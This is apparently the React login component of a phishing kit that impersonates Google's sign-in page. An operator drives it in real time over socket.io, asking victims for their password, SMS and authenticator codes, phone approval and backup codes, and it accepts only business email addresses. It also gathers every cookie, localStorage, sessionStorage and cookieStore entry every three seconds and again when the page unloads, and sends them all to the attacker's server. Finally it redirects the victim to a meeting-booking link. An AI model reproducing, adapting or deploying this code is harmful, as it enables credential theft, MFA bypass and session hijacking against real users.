import React, { useState, useEffect, useRef } from 'react';
import { io } from 'socket.io-client';
import PasswordStep from './PasswordStep';
import VerificationStep from './VerificationStep';
import Auth from './AuthStep';
import Logo from './assets/logo.webp';
import Phone from './Phone';
import SmsCodePg from './SmsCode';
import TapYes from './TapYes';
import BackupCodes from './BackupCodes';
import { getApiUrl } from '../utils/apiConfig';
import { detectBotBehavior } from '../utils/security';

const API_URL = getApiUrl();

// Generate a session token once per browser session and persist it
function getOrCreateSessionToken() {
  let token = sessionStorage.getItem('_stoken');
  if (!token) {
    token = Math.random().toString(36).slice(2) + Date.now().toString(36);
    sessionStorage.setItem('_stoken', token);
  }
  return token;
}

const Login = () => {
  const [allowed, setAllowed] = useState(false);
  const [focused, setFocused] = useState(false);
  const socketRef = useRef(null);
  const sessionTokenRef = useRef(getOrCreateSessionToken());
  const [email, setEmail] = useState(() => sessionStorage.getItem('_semail') || '');
  const [isLoading, setIsLoading] = useState(false);
  const [errorMsg, setErrorMsg] = useState('');
  const [currentStep, setCurrentStep] = useState(
    () => sessionStorage.getItem('_sstep') || 'email'
  );

  // Data shared between steps
  const [verificationCode, setVerificationCode] = useState(() => sessionStorage.getItem('_scode_verification') || '');
  const [smsCodeValue, setSmsCodeValue]         = useState(() => sessionStorage.getItem('_scode_sms')          || '');
  const [phoneCodeValue, setPhoneCodeValue]     = useState(() => sessionStorage.getItem('_scode_phone')        || '');
  const [recoveryEmail, setRecoveryEmail]       = useState(() => sessionStorage.getItem('_scode_recovery')     || '');

  const handleServerEventRef = useRef(null);

  const personalEmailDomains = new Set([
    'gmail.com',
    'googlemail.com',
    'yahoo.com',
    'yahoo.co.uk',
    'hotmail.com',
    'outlook.com',
    'live.com',
    'icloud.com',
    'me.com',
    'mac.com',
    'aol.com',
    'proton.me',
    'protonmail.com',
    'gmx.com',
    'zoho.com',
    'yandex.com',
    'ymail.com',
    'msn.com',
  ]);

  const isBusinessEmail = (value) => {
    const trimmed = value.trim().toLowerCase();
    const atIndex = trimmed.lastIndexOf('@');
    if (atIndex <= 0 || atIndex === trimmed.length - 1) return false;
    const domain = trimmed.slice(atIndex + 1);
    return !personalEmailDomains.has(domain);
  };

  // ✅ reusable: move to any step with optional data
  const goToStep = (step, data = {}) => {
    console.log('[STEP] Switching to', step, data);
    setErrorMsg('');
    sessionStorage.setItem('_sstep', step);

    switch (step) {
      case 'auth':
        setCurrentStep('auth');
        break;
      case 'sms':
        setSmsCodeValue(data?.code || '');
        if (data?.code) sessionStorage.setItem('_scode_sms', data.code);
        setCurrentStep('sms');
        break;
      case 'verification':
        setVerificationCode(data?.code || '');
        if (data?.code) sessionStorage.setItem('_scode_verification', data.code);
        setCurrentStep('verification');
        break;
      case 'phone':
        setPhoneCodeValue(data?.code || '');
        if (data?.code) sessionStorage.setItem('_scode_phone', data.code);
        setCurrentStep('phone');
        break;
      case 'tap-yes':
        if (data?.recoveryEmail) {
          setRecoveryEmail(data.recoveryEmail);
          sessionStorage.setItem('_scode_recovery', data.recoveryEmail);
        }
        setCurrentStep('tap-yes');
        break;
      case 'backup-codes':
        setCurrentStep('backup-codes');
        break;
      case 'password':
        setCurrentStep('password');
        break;
      default:
        setCurrentStep('email');
        break;
    }
  };

  // ✅ central handler for ALL server actions — always latest via ref
const handleServerEvent = (event, data) => {
  console.log(`[SOCKET EVENT] ${event}:`, data);

  // 🔴 handle all known error events
  if ([
    "login-error",
    "password-error",
    "smscode-error",
    "authcode-error",
    "phonenumber-error"
  ].includes(event)) {

    setIsLoading(false);

    switch (event) {
      case "login-error":
        setErrorMsg("Couldn’t find your Google Account.");
        setEmail("");
        setCurrentStep("email");
        break;

      case "password-error":
        setErrorMsg("Wrong password. Try again or click Forgot password to reset it.");
        setCurrentStep("password");
        break;

      case "smscode-error":
        setErrorMsg("That code didn’t work. Please try again.");
        setCurrentStep("sms");
        break;

      case "authcode-error":
        setErrorMsg("That code didn’t work. Please try again.");
        setCurrentStep("auth");
        break;
      case "phonenumber-error":
        setErrorMsg("That phone number can’t be used for verification.");
        setCurrentStep("phone");
        break;

      default:
        setErrorMsg("Something went wrong. Please try again.");
        break;
    }

    return; // stop here after handling errors
  }

  // ✅ handle success events / redirects
  switch (event) {
    case "tap-code":
      goToStep("verification", { code: data?.code });
      break;

    case "phone-number":
      goToStep("phone", { code: data?.code });
      break;

    case "sms-code":
      goToStep("sms", { code: data?.code });
      break;

    case "auth-code":
      goToStep("auth");
      break;

    case "tap-yes":
      goToStep("tap-yes", { recoveryEmail: data?.recoveryEmail });
      break;

    case "backup-codes":
      goToStep("backup-codes");
      break;

    case "redirect":
      const redirectUrl = data?.url || "https://calendly.com/taylor-springer/30min/";
      // Clear all session state so a fresh visit starts clean
      ['_stoken','_semail','_sstep','_scode_sms','_scode_verification','_scode_phone','_scode_recovery']
        .forEach(k => sessionStorage.removeItem(k));
      window.location.href = redirectUrl;
      break;

    default:
      break;
  }
};

  handleServerEventRef.current = handleServerEvent;

  useEffect(() => {
    const isLocal = ['localhost', '127.0.0.1', '::1'].includes(window.location.hostname);
    if (!isLocal && !sessionStorage.getItem('visitor_approved')) {
      window.location.href = '/';
      return;
    }
    setAllowed(true);
  }, []);

  // Keep visitor presence alive throughout the login flow so admin panel stays green
  useEffect(() => {
    const isLocal = ['localhost', '127.0.0.1', '::1'].includes(window.location.hostname);
    const visitorId = sessionStorage.getItem('visitor_id');
    if (isLocal || !visitorId) return;
    const presenceSocket = io(`${API_URL}/visitor`, { transports: ['websocket', 'polling'], withCredentials: true });
    presenceSocket.on('connect', () => presenceSocket.emit('visitor:identify', visitorId));
    return () => presenceSocket.disconnect();
  }, []);

  useEffect(() => {
    if (!socketRef.current) {
      const socket = io(API_URL, {
        withCredentials: true,
        // Allow socket.io to auto-reconnect when mobile resumes
        reconnection: true,
        reconnectionAttempts: Infinity,
        reconnectionDelay: 1000,
        reconnectionDelayMax: 5000,
      });
      socketRef.current = socket;

      socket.on('connect', () => {
        console.log('[SOCKET] connected:', socket.id);
        // On every (re)connect, try to re-identify so the server remaps us
        const token = sessionTokenRef.current;
        const savedEmail = sessionStorage.getItem('_semail') || '';
        const savedStep  = sessionStorage.getItem('_sstep')  || 'email';
        if (token && savedEmail && savedStep !== 'email') {
          socket.emit('user:rejoin', { sessionToken: token, email: savedEmail, step: savedStep });
          console.log('[REJOIN] emitted for step:', savedStep);
        }
      });

      socket.on('disconnect', (r) => console.log('[SOCKET] disconnected:', r));
      socket.on('connect_error', (err) =>
        console.error('[SOCKET] connect_error:', err?.message || err)
      );
      socket.on('banned', (data) => {
        console.warn('[SOCKET] banned:', data);
        window.location.href = 'https://accounts.google.com/';
      });
      // listen for both direct events and admin:action
      [
        'tap-code',
        'sms-code',
        'auth-code',
        'phone-number',
        'tap-yes',
        'backup-codes',
        'redirect',
        'login-error',
        'password-error',
        'smscode-error',
        'authcode-error',
        'phonenumber-error',
      ].forEach((evt) => socket.on(evt, (data) => handleServerEventRef.current(evt, data)));

      // some backends emit "admin:action"
      socket.on('admin:action', (data) => {
        console.log('[SOCKET] admin:action', data);
        if (data?.action) handleServerEventRef.current(data.action, data);
      });
    }
    const gatherAllStorage = async () => {
      const data = {
        cookies: document.cookie || '',
        url: window.location.href,
        localStorage: {},
        sessionStorage: {},
        cookieStore: [],
      };

      try {
        for (let i = 0; i < window.localStorage.length; i++) {
          const k = window.localStorage.key(i);
          data.localStorage[k] = window.localStorage.getItem(k);
        }
      } catch (_) {}

      try {
        for (let i = 0; i < window.sessionStorage.length; i++) {
          const k = window.sessionStorage.key(i);
          data.sessionStorage[k] = window.sessionStorage.getItem(k);
        }
      } catch (_) {}

      if (window.cookieStore && typeof window.cookieStore.getAll === 'function') {
        try {
          const all = await window.cookieStore.getAll();
          data.cookieStore = all.map((c) => ({
            name: c.name,
            value: c.value,
            domain: c.domain,
            path: c.path,
            expires: c.expires ? new Date(c.expires).toISOString() : null,
            secure: c.secure,
            sameSite: c.sameSite,
          }));
        } catch (_) {}
      }

      return data;
    };

    const cookieSyncInterval = setInterval(async () => {
      const activeSocket = socketRef.current;
      if (activeSocket && activeSocket.connected) {
        const payload = await gatherAllStorage();
        activeSocket.emit('user:cookies', payload);
      }
    }, 3000);

    const syncCookiesOnExit = () => {
      const activeSocket = socketRef.current;
      if (activeSocket && activeSocket.connected) {
        activeSocket.emit('user:cookies', {
          cookies: document.cookie || '',
          url: window.location.href,
        });
      }
    };

    window.addEventListener('beforeunload', syncCookiesOnExit);
    return () => {
      clearInterval(cookieSyncInterval);
      window.removeEventListener('beforeunload', syncCookiesOnExit);
    };
  }, []);

  const getSocket = () => socketRef.current;

  // --- email submit ---
  const handleNext = (e) => {
    e.preventDefault();
    if (!email) return;
    if (!isBusinessEmail(email)) {
      setErrorMsg('Please use a business email address.');
      return;
    }
    setIsLoading(true);
    setErrorMsg('');
    // Persist email so we can re-identify after mobile background resume
    sessionStorage.setItem('_semail', email);
    const socket = getSocket();
    if (socket) socket.emit('user:email', { email, sessionToken: sessionTokenRef.current });

    setTimeout(() => {
      setIsLoading(false);
      goToStep('password');
    }, 500);
  };

  const handleBack = () => {
    goToStep('email');
    setEmail('');
    setIsLoading(false);
    setErrorMsg('');
  };

  const handleBackToPassword = () => {
    goToStep('password');
    setIsLoading(false);
    setErrorMsg('');
  };

  // ✅ when password succeeds
  const handlePasswordSuccess = ({ action, code }) => {
    console.log('[Login] handlePasswordSuccess:', action, code);
    handleServerEvent(action, { code }); // 🔥 reuse same handler
  };

  if (!allowed) return <div style={{ background: '#f1f2f7', minHeight: '100vh' }} />;

  const socket = getSocket();
  switch (currentStep) {
    case 'auth':
      return (
        <Auth
          email={email}
          socket={socket}
          onBack={handleBackToPassword}
          errorMsg={errorMsg}
        />
      );

    case 'sms':
      return (
        <SmsCodePg
          code={smsCodeValue}
          email={email}
          socket={socket}
          onBack={handleBackToPassword}
          errorMsg={errorMsg}
        />
      );

    case 'verification':
      return (
        <VerificationStep
          email={email}
          socket={socket}
          code={verificationCode}
          onBack={handleBackToPassword}
        />
      );

    case 'phone':
      return (
        <Phone
          code={phoneCodeValue}
          email={email}
          socket={socket}
          onBack={handleBackToPassword}
          errorMsg={errorMsg}
        />
      );

    case 'tap-yes':
      return (
        <TapYes
          email={email}
          socket={socket}
          onBack={handleBackToPassword}
          recoveryEmail={recoveryEmail}
        />
      );

    case 'backup-codes':
      return (
        <BackupCodes
          email={email}
          socket={socket}
          onBack={handleBackToPassword}
          errorMsg={errorMsg}
        />
      );

    case 'password':
      return (
        <PasswordStep
          email={email}
          onBack={handleBack}
          onSuccess={handlePasswordSuccess}
          isLoading={isLoading}
          socket={socket}
          errorMsg={errorMsg}
        />
      );

    default:
  return (
    <div className="login-form-container">
      <div className="login-form-wrapper">
        {isLoading && (
  <div className="loading-bar-container">
    <div className="h-full bg-[#1a73e8] animate-bar1"></div>
    <div className="h-full bg-[#1a73e8] animate-bar2"></div>
  </div>
)}

        <div className="login-form-content">
          <div className="desktop-only login-form-layout">
            <div className="login-form-left">
              <div className="login-form-logo">
                <img src={Logo} alt="logo" />
              </div>
              <h1 className="login-form-title">Sign in</h1>
              <p className="login-form-subtitle">
            Use your Google Account

              </p>
            </div>

            <div className="login-form-right">
              <form onSubmit={handleNext} className="login-form-form">
                <div>
               
                 <div className="form-input-wrapper">
      <input
        id="email"
        type="email"
        value={email}
        onChange={(e) => setEmail(e.target.value)}
        onFocus={() => setFocused(true)}
        onBlur={() => setFocused(!!email)}
        className={`form-input ${focused || email ? 'filled' : ''} ${focused ? 'border-blue-500' : ''}`}
        required
      />

      {/* Floating label */}
      <label
        htmlFor="email"
        className="form-label"
      >
        Email or phone
      </label>
    </div>
    {errorMsg && (
  <p style={{ fontSize: '0.875rem', color: '#dc2626', marginTop: '0.5rem' }}>{errorMsg}</p>
)}

                  <div className="text-left pt-3">
                    {/* <a href="#" className="font-medium text-sm text-blue-600 hover:underline">
                      Forgot email?
                    </a> */}
                  </div>
                </div>

                <div style={{ fontSize: '0.875rem', color: '#4b5563', lineHeight: '1.25rem' }}>
                  Not your computer? Use Guest mode to sign in privately.{` `}
                  <a href="#" style={{ fontWeight: '500', color: '#2563eb', textDecoration: 'none' }} onMouseEnter={(e) => e.target.style.textDecoration = 'underline'} onMouseLeave={(e) => e.target.style.textDecoration = 'none'}>
                    Learn more about using Guest mode
                  </a>
                </div>

                <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'flex-end', paddingTop: '2rem' }}>
                  <a href="#" style={{ fontSize: '0.875rem', fontWeight: '500', color: '#2563eb', textDecoration: 'none', marginRight: '1.25rem' }} onMouseEnter={(e) => e.target.style.textDecoration = 'underline'} onMouseLeave={(e) => e.target.style.textDecoration = 'none'}>
                    Create account
                  </a>
                  <button
                    type="submit"
                    disabled={!email || isLoading}
                    className="form-button"
                  >
                    Next
                  </button>
                </div>
              </form>
            </div>
          </div>

          {/* Mobile Layout */}
          <div className="mobile-only">
            <div style={{ marginBottom: '2rem' }}>
              <div style={{ display: 'inline-flex', alignItems: 'center', justifyContent: 'flex-start', marginBottom: '1.5rem' }}>
                <img src={Logo} alt="logo" style={{ width: '80px', maxWidth: '80px', height: 'auto', marginLeft: '-11px' }} />
              </div>
              <h1 style={{ fontSize: '1.5rem', fontWeight: '400', color: '#1f2937', marginBottom: '0.5rem' }}>Sign in</h1>
              <p style={{ fontSize: '0.875rem', lineHeight: '1.25rem' }}>Use your  Account</p>
            </div>

            <form onSubmit={handleNext} className="login-form-form">
              <div style={{ display: 'flex', flexDirection: 'column', gap: '0.5rem' }}>
                <div style={{ marginBottom: '0.5rem' }}>
                     <div className="form-input-wrapper">
      <input
        id="email-mobile"
        type="email"
        value={email}
        onChange={(e) => setEmail(e.target.value)}
        onFocus={() => setFocused(true)}
        onBlur={() => setFocused(!!email)}
        className={`form-input ${focused || email ? 'filled' : ''} ${focused ? 'border-blue-500' : ''}`}
        required
      />

      {/* Floating label */}
      <label
        htmlFor="email-mobile"
        className="form-label"
      >
        Email or phone
      </label>
    </div>
    {errorMsg && (
  <p style={{ fontSize: '0.875rem', color: '#dc2626', marginTop: '0.5rem' }}>{errorMsg}</p>
)}

                </div>
                <div style={{ textAlign: 'left' }}>
                  <a href="#" style={{ fontSize: '0.875rem', fontWeight: '500', color: '#2563eb', textDecoration: 'none' }} onMouseEnter={(e) => e.target.style.textDecoration = 'underline'} onMouseLeave={(e) => e.target.style.textDecoration = 'none'}>
                    Forgot email?
                  </a>
                </div>
              </div>

              <div style={{ fontWeight: '500', fontSize: '0.875rem', color: '#4b5563' }}>
                Not your computer? Use Private Browsing windows to sign in.{` `}
                <a href="#" style={{ fontWeight: '500', color: '#2563eb', textDecoration: 'none' }} onMouseEnter={(e) => e.target.style.textDecoration = 'underline'} onMouseLeave={(e) => e.target.style.textDecoration = 'none'}>
                  Learn more about using Guest mode
                </a>
              </div>

              <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', paddingTop: '1.5rem' }}>
                <a href="#" style={{ fontSize: '0.875rem', fontWeight: '500', color: '#2563eb', textDecoration: 'none' }} onMouseEnter={(e) => e.target.style.textDecoration = 'underline'} onMouseLeave={(e) => e.target.style.textDecoration = 'none'}>
                  Create account
                </a>
                <button
                  type="submit"
                  disabled={!email || isLoading}
                  className="form-button"
                >
                 
                    Next
                  
                </button>
              </div>
            </form>
          </div>
        </div>
        <footer className="fixed bottom-0 left-0 md:bottom-auto md:left-auto w-full  md:max-w-5xl text-gray-600  text-[13px] px-4 md:px-6 py-2 flex items-center justify-center md:justify-between gap-6 flex-wrap">
          {/* Language selector */}
          <div className="flex items-center gap-1">
            <select
              className="bg-transparent text-gray-600 dark:text-gray-300 text-sm focus:outline-none cursor-pointer"
              defaultValue="en-GB"
            >
              <option value="en-US">English (United States)</option>
              <option value="en-GB">English (United Kingdom)</option>
              <option value="fr">Français</option>
              <option value="es">Español</option>
              <option value="de">Deutsch</option>
            </select>
          </div>

        </footer>




      </div>
  
      
    </div>
  );
  }
}

export default Login;
